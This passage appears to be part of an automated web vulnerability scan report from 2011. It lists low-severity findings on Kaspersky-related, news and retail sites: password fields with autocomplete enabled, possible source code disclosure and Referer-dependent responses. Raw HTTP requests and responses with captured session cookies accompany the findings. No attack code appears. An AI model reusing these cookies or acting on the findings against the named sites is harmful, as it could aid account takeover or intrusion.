<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<!
...[SNIP]...
</div>

   <form action="http://forum.kaspersky.com/index.php" method="post">
   <input type="hidden" name="act" value="Login" />
...[SNIP]...
</h4>
       <input type="password" size="20" name="PassWord" />
       <p class="formbuttonrow1">
...[SNIP]...

11.5. https://lwn.net/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://lwn.net
Path:	/login

Issue detail

The page contains a form with the following action URL:

https://lwn.net/login

The form contains the following password field with autocomplete enabled:

Password

Request

GET /login HTTP/1.1
Host: lwn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 14:01:57 GMT
Server: Apache
Expires: -1
Content-Length: 5637
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>Log into LWN [LWN.net]</title>
<meta HTTP-EQU
...[SNIP]...
<p>
<form action="https://lwn.net/login" method="post" name="loginform">
<table class="Form">
...[SNIP]...
<td><input size="20" type="password" name="Password" /></td>
...[SNIP]...

11.6. http://twitter.com/kaspersky previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/kaspersky

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /kaspersky HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.7. http://twitter.com/search previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/search

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /search HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:04:09 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315145049-21758-35204
ETag: "3467c9de464da2d0541e2d0e5221854a"
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 04 Sep 2011 14:04:09 GMT
X-Runtime: 0.02574
Content-Type: text/html; charset=utf-8
Content-Length: 20351
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 930fd3922666df2d744bdd129c8c4f862385bc95
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlMzY4MTAzMzIwYTU0MDNmOWJkMThiMGViOWU3OTE3%250ANWE6DnJldHVybl90byIcaHR0cDovL3R3aXR0ZXIuY29tL2hvbWU6FWluX25l%250Ad191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIyZFxNDIBIgpmbGFzaElDOidB%250AY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA%250AOgdpZCIlMjg5ZWYzNjJiOTliOTU2ZGQwYjI1ODE3YTUwMGNjODU%253D--1d9639579085ed1ab4850fecaa00cb41fafbd9ac; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html;
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="9870d6bc4ea0fca7a2466e15b6265cf61874f5b7" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

11.8. http://virusalert.nl/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://virusalert.nl
Path:	/

Issue detail

The page contains a form with the following action URL:

http://virusalert.nl/?show=login

The form contains the following password field with autocomplete enabled:

wachtwoord

Request

GET / HTTP/1.1
Host: virusalert.nl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.9. http://www.2linkme.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.2linkme.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.2linkme.com/?

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.2linkme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.10. http://www.cdw.com/content/brands/trendmicro/default.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.cdw.com
Path:	/content/brands/trendmicro/default.aspx

Issue detail

The page contains a form with the following action URL:

https://www.cdw.com/shop/eaccount/logon/LogOnProcessor.aspx?target=%2fcontent%2fbrands%2ftrendmicro%2fdefault.aspx

The form contains the following password field with autocomplete enabled:

UserPassword

Request

GET /content/brands/trendmicro/default.aspx HTTP/1.1
Host: www.cdw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI FIN COM NAV INT STA",
Date: Sun, 04 Sep 2011 14:06:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 75469

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.0 Transitional//EN'>
<html lang='en'><head><title>Trend Micro - Enterprise Security Endpoints, Office Scan 10.5</title>
<meta http-equiv='Content-Type' cont
...[SNIP]...

<form class="gh-form" name="LogonForm" id="LogonForm" method="post" action="https://www.cdw.com/shop/eaccount/logon/LogOnProcessor.aspx?target=%2fcontent%2fbrands%2ftrendmicro%2fdefault.aspx">
<p class="popup-row">
...[SNIP]...
<br />
<input id="password" type="password" tabindex="5101" class="txtbox-logon" name="UserPassword" maxlength="50" onkeypress="javascript:FloatingLogonKey(event);" />
<span class="grey-arrow-bg margin-bottom5">
...[SNIP]...

11.11. http://www.cdw.com/shop/search/hubs/Products/Software/F.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.cdw.com
Path:	/shop/search/hubs/Products/Software/F.aspx

Issue detail

The page contains a form with the following action URL:

https://www.cdw.com/shop/eaccount/logon/LogOnProcessor.aspx?target=http%3a%2f%2fwww.cdw.com%2fshop%2fsearch%2fhub.aspx%3fwclss%3dF

The form contains the following password field with autocomplete enabled:

UserPassword

Request

GET /shop/search/hubs/Products/Software/F.aspx HTTP/1.1
Host: www.cdw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI FIN COM NAV INT STA",
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:06:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 244287

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.0 Transitional//EN'>
<html lang='en'><head><title>Computer Software</title>
<meta http-equiv='Content-Type' content='text/html; charset=ISO-8859-1'/>
<meta
...[SNIP]...

<form class="gh-form" name="LogonForm" id="LogonForm" method="post" action="https://www.cdw.com/shop/eaccount/logon/LogOnProcessor.aspx?target=http%3a%2f%2fwww.cdw.com%2fshop%2fsearch%2fhub.aspx%3fwclss%3dF">
<p class="popup-row">
...[SNIP]...
<br />
<input id="password" type="password" tabindex="5101" class="txtbox-logon" name="UserPassword" maxlength="50" onkeypress="javascript:FloatingLogonKey(event);" />
<span class="grey-arrow-bg margin-bottom5">
...[SNIP]...

11.12. http://www.cdw.com/shop/search/software-titles/symantec-endpoint-protection.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.cdw.com
Path:	/shop/search/software-titles/symantec-endpoint-protection.aspx

Issue detail

The page contains a form with the following action URL:

https://www.cdw.com/shop/eaccount/logon/LogOnProcessor.aspx?target=%2fshop%2fsearch%2fsoftware-titles%2fsymantec-endpoint-protection.aspx

The form contains the following password field with autocomplete enabled:

UserPassword

Request

GET /shop/search/software-titles/symantec-endpoint-protection.aspx HTTP/1.1
Host: www.cdw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI FIN COM NAV INT STA",
Date: Sun, 04 Sep 2011 14:06:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119291

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.0 Transitional//EN'>
<html lang='en'><head><title>Symantec Endpoint Protection</title>
<meta http-equiv='Content-Type' content='text/html; charset=ISO-8859-
...[SNIP]...

<form class="gh-form" name="LogonForm" id="LogonForm" method="post" action="https://www.cdw.com/shop/eaccount/logon/LogOnProcessor.aspx?target=%2fshop%2fsearch%2fsoftware-titles%2fsymantec-endpoint-protection.aspx">
<p class="popup-row">
...[SNIP]...
<br />
<input id="password" type="password" tabindex="5101" class="txtbox-logon" name="UserPassword" maxlength="50" onkeypress="javascript:FloatingLogonKey(event);" />
<span class="grey-arrow-bg margin-bottom5">
...[SNIP]...

11.13. http://www.cdw.com/shop/search/software-titles/websense-web-security.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.cdw.com
Path:	/shop/search/software-titles/websense-web-security.aspx

Issue detail

The page contains a form with the following action URL:

https://www.cdw.com/shop/eaccount/logon/LogOnProcessor.aspx?target=%2fshop%2fsearch%2fsoftware-titles%2fwebsense-web-security.aspx

The form contains the following password field with autocomplete enabled:

UserPassword

Request

GET /shop/search/software-titles/websense-web-security.aspx HTTP/1.1
Host: www.cdw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI FIN COM NAV INT STA",
Date: Sun, 04 Sep 2011 14:06:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 94650

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.0 Transitional//EN'>
<html lang='en'><head><title>Websense Web Security</title>
<meta http-equiv='Content-Type' content='text/html; charset=ISO-8859-1'/>
<
...[SNIP]...

<form class="gh-form" name="LogonForm" id="LogonForm" method="post" action="https://www.cdw.com/shop/eaccount/logon/LogOnProcessor.aspx?target=%2fshop%2fsearch%2fsoftware-titles%2fwebsense-web-security.aspx">
<p class="popup-row">
...[SNIP]...
<br />
<input id="password" type="password" tabindex="5101" class="txtbox-logon" name="UserPassword" maxlength="50" onkeypress="javascript:FloatingLogonKey(event);" />
<span class="grey-arrow-bg margin-bottom5">
...[SNIP]...

11.14. http://www.h-online.com/userdb/sso previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.h-online.com
Path:	/userdb/sso

Issue detail

The page contains a form with the following action URL:

http://www.h-online.com/userdb/sso

The form contains the following password field with autocomplete enabled:

password

Request

GET /userdb/sso HTTP/1.1
Host: www.h-online.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.15. http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scmagazine.com.au
Path:	/News/268907,kaspersky-website-vulnerable-to-xss.aspx

Issue detail

The page contains a form with the following action URL:

http://www.scmagazine.com.au/News/Article.aspx?id=268907

The form contains the following password fields with autocomplete enabled:

ctl00$ctl00$LoginModalCtrl$PasswordTextbox_Login
ctl00$ctl00$RegistrationModalCtrl$PasswordTextbox_Reg
ctl00$ctl00$RegistrationModalCtrl$ConfirmPasswordTextbox_Reg

Request

Response

11.16. http://www.scmagazine.com.au/Tools/Email.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scmagazine.com.au
Path:	/Tools/Email.aspx

Issue detail

The page contains a form with the following action URL:

http://www.scmagazine.com.au/Tools/Email.aspx

The form contains the following password fields with autocomplete enabled:

ctl00$ctl00$LoginModalCtrl$PasswordTextbox_Login
ctl00$ctl00$RegistrationModalCtrl$PasswordTextbox_Reg
ctl00$ctl00$RegistrationModalCtrl$ConfirmPasswordTextbox_Reg

Request

GET /Tools/Email.aspx HTTP/1.1
Host: www.scmagazine.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.17. http://www.securelist.com/en/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.securelist.com
Path:	/en/

Issue detail

The page contains a form with the following action URL:

http://www.securelist.com/en/login

The form contains the following password field with autocomplete enabled:

PASSWD

Request

Response

11.18. http://www.securelist.com/en/blog previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.securelist.com
Path:	/en/blog

Issue detail

The page contains a form with the following action URL:

http://www.securelist.com/en/login

The form contains the following password field with autocomplete enabled:

PASSWD

Request

GET /en/blog HTTP/1.1
Host: www.securelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.19. http://www.securelist.com/en/blog/2312/Another_live_XSS_vulnerability previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.securelist.com
Path:	/en/blog/2312/Another_live_XSS_vulnerability

Issue detail

The page contains a form with the following action URL:

http://www.securelist.com/en/blog/2312/login

The form contains the following password field with autocomplete enabled:

PASSWD

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 14:13:38 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
X-Showed: kaspen:vl:klblog=2312;vlyrub=8;vlxhtml=101
Content-Length: 21589

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Another live XSS vulnerability - Securelist</title>

<link rel="alternate" type="application/rss+xml" title="Securel
...[SNIP]...
<td class="cntr" style="padding-left:18px;padding-right:18px;">

<form action="login" method="post">
<input type="hidden" name="REFERER" value="blog/2312/Another_live_XSS_vulnerability#add">
...[SNIP]...
<p><input type="password" name="PASSWD" value="" class="w100"></p>
...[SNIP]...

11.20. http://www.securelist.com/en/blog/2312/Another_live_XSS_vulnerability previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.securelist.com
Path:	/en/blog/2312/Another_live_XSS_vulnerability

Issue detail

The page contains a form with the following action URL:

http://www.securelist.com/en/blog/2312/login

The form contains the following password field with autocomplete enabled:

PASSWD

Request

Response

11.21. http://www.securelist.com/en/find previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.securelist.com
Path:	/en/find

Issue detail

The page contains a form with the following action URL:

http://www.securelist.com/en/login

The form contains the following password field with autocomplete enabled:

PASSWD

Request

Response

11.22. http://www.securelist.com/en/polls previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.securelist.com
Path:	/en/polls

Issue detail

The page contains a form with the following action URL:

http://www.securelist.com/en/login

The form contains the following password field with autocomplete enabled:

PASSWD

Request

GET /en/polls HTTP/1.1
Host: www.securelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.23. http://www.securelist.com/en/weblog previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.securelist.com
Path:	/en/weblog

Issue detail

The page contains a form with the following action URL:

http://www.securelist.com/en/login

The form contains the following password field with autocomplete enabled:

PASSWD

Request

GET /en/weblog HTTP/1.1
Host: www.securelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The page contains a form with the following action URL:

http://www.stylemepretty.com/wp-login.php

The form contains the following password field with autocomplete enabled:

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The page contains a form with the following action URL:

https://www.stylemepretty.com/wp-login.php

The form contains the following password field with autocomplete enabled:

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:14:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:14:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
<div id="sign-in">
    <form method="post" action="https://www.stylemepretty.com/wp-login.php">
    <input type="submit" value="Log In" id="log-in" name="wp-submit" style="border:0px;padding:0px;" />
...[SNIP]...
<input type="text" name="log" id="sign-in-username" />
    <input type="password" name="pwd" id="sign-in-password" />
    <input type="submit" value="Go" id="sign-in-btn" />
...[SNIP]...

12. Source code disclosure previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://kaspersky.ugc.bazaarvoice.com
Path:	/module/8811/cmn/8811/display.pkg.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /module/8811/cmn/8811/display.pkg.js HTTP/1.1
Host: kaspersky.ugc.bazaarvoice.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/pure?ICID=INT1673886
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="Bazaarvoice does not have a P3P policy."
Last-Modified: Thu, 01 Sep 2011 08:40:37 GMT
Content-Type: text/javascript;charset=utf-8
Vary: Accept-Encoding
Content-Length: 109248
Cache-Control: max-age=1716
Expires: Sun, 04 Sep 2011 12:52:14 GMT
Date: Sun, 04 Sep 2011 12:23:38 GMT
Connection: close

$BV.Internal.define("jquery.effects.core",[document],["jquery.core"],function(a,b){
/*
* jQuery UI Effects 1.8.6
*
* Copyright 2010, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under t
...[SNIP]...
<H;E++){G.call(F,E)}};C.mixin=function(E){d(C.functions(E),function(F){q(F,C[F]=E[F])})};var k=0;C.uniqueId=function(E){var F=k++;return E?E+F:F};C.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g};C.template=function(H,G){var I=C.templateSettings;var E="var __p=[],print=function(){__p.push.apply(__p,arguments);};with(obj||{}){__p.push('"+H.replace(/\\/g,"\\\\").replace(/'/g,"\\'").replace(I.
...[SNIP]...

13. Referer-dependent response previous next
There are 3 instances of this issue:

http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
http://www.facebook.com/plugins/like.php
http://www.h-online.com/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

13.1. http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://searchsecurity.techtarget.com
Path:	/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise

Request 1

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:14:44 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: googFCF=a37ee93fdfdd1310VgnVCM1000000d01c80aRCRD; Domain=.techtarget.com; Path=/
Set-Cookie: referrer=referrerhttp%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db%3Bkeyword%2522xss.cx%2522%3Basrc%3Beid%0A; Domain=.techtarget.com; Path=/
P3P: CP="CAO DSP COR NID CURa ADMa TAIa IVAo IVDo CONo TELo OTPo OUR IND PHY ONL UNI NAV DEM"
Content-Length: 66197

<!DOCTYPE html>
<html>
<head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getTime()])</script>
<script>
var appCode=55;
</script>
<meta name="pageStart" content="1315138484736" />








   <title>Addressing the dangers of JavaScript in the enterprise</title>

<meta name="description" content="Learn about the dangers of JavaScript, JavaScript vulnerabilities, and what you and your organization can do to secure JavaScript in the future." />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>

<meta name="robots" content="noodp"/>

<link rel="alternate" type="application/rss+xml" title="SearchSecurity.com: Network Security Tactics" href="http://searchsecurity.techtarget.com/rss/Network-Security-Tactics.xml" />

<link rel="alternate" type="application/rss+xml" title="SearchSecurity.com: ContentSyndication" href="http://searchsecurity.techtarget.com/rss/ContentSyndication.xml" />


<script type="text/javascript">

/* Start : Initalizing Ad Ids to taxes variable */
var taxes=[];

...[SNIP]...

Request 2

GET /tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise HTTP/1.1
Host: searchsecurity.techtarget.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:14:50 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
P3P: CP="CAO DSP COR NID CURa ADMa TAIa IVAo IVDo CONo TELo OTPo OUR IND PHY ONL UNI NAV DEM"
Content-Length: 66922

<!DOCTYPE html>
<html>
<head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getTime()])</script>
<script>
var appCode=55;
</script>
<meta name="pageStart" content="1315138490965" />








   <title>Addressing the dangers of JavaScript in the enterprise</title>

<meta name="description" content="Learn about the dangers of JavaScript, JavaScript vulnerabilities, and what you and your organization can do to secure JavaScript in the future." />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>

<meta name="robots" content="noodp"/>

<link rel="alternate" type="application/rss+xml" title="SearchSecurity.com: Network Security Tactics" href="http://searchsecurity.techtarget.com/rss/Network-Security-Tactics.xml" />

<link rel="alternate" type="application/rss+xml" title="SearchSecurity.com: ContentSyndication" href="http://searchsecurity.techtarget.com/rss/ContentSyndication.xml" />


<script type="text/javascript">

/* Start : Initalizing Ad Ids to taxes variable */
var taxes=[];
var adIdString = "299972,301219";
if(adIdString != null && adIdString != "null"){
   var adIds = adIdString.split(",");
   for (var i = 0; i < adIds.length; i++) {
       taxes[i]=adIds[i];
   }
}
/* END : Initalizing Ad Ids to taxes variable */

google_ad_client = 'ca-pub-6050985421795229';
google_ad_channel ='Other';
google_ad_output = 'js';
google_max_num_ads = 5;

//Environment Vars
var ENV_name ='PROD';
var ENV_isStage = false;
var ENV_mediaHost = 'http://cdn.ttgtmedia.com/rms/ux';
var ENV_c
...[SNIP]...

13.2. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?href=http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx&layout=standard&show_faces=false&width=270&action=like&font&colorscheme=light&height=30 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
